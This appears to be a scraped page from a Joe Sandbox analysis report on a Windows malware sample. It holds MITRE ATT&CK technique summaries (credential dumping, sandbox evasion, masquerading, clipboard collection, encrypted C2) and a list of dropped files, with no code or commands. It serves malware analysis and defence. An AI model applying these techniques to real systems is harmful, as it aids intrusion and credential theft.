Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report UolJwovI8c.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\18a45226

C:\Users\user\AppData\Local\Temp\Amatol_20241202012405.log

C:\Users\user\AppData\Local\Temp\Qjsync.exe

C:\Users\user\AppData\Local\Temp\b9304be

C:\Users\user\AppData\Local\Temp\dicxrxnwre

C:\Users\user\AppData\Local\Temp\eec6af15

C:\Users\user\AppData\Local\Temp\ekxwihvmv

C:\Users\user\AppData\Local\Temp\idrccptxisabu

C:\Users\user\AppData\Roaming\GZManage\js3250.dll

C:\Users\user\AppData\Roaming\GZManage\noubls

C:\Users\user\AppData\Roaming\GZManage\nsldap32v50.dll

C:\Users\user\AppData\Roaming\GZManage\nsldappr32v50.dll

C:\Users\user\AppData\Roaming\GZManage\nspr4.dll

C:\Users\user\AppData\Roaming\GZManage\nss3.dll

C:\Users\user\AppData\Roaming\GZManage\plc4.dll

C:\Users\user\AppData\Roaming\GZManage\plds4.dll

Windows Analysis Report
UolJwovI8c.exe

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre